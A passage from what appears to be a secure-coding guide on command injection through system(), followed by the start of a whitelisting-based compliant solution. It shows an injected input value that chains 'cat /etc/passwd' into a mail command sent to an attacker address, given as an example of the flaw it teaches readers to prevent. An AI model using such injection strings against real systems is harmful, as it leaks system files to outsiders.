...
| Code Block |
|---|
bogus@addr.com; cat /etc/passwd | mail some@badguy.net |
For more info on the system() call, see ENV03-A. Sanitize the environment before invoking external programs and ENV04-A. Do not call system() if you do not need a command processor.
Compliant Solution
It is necessary to ensure that all valid data is accepted, while potentially dangerous data is rejected or sanitized. This can be difficult when valid characters or sequences of characters also have special meaning to the subsystem and may involve validating the data against a grammar. In cases where there is no overlap, white listing can be used to eliminate dangerous characters from the data.
...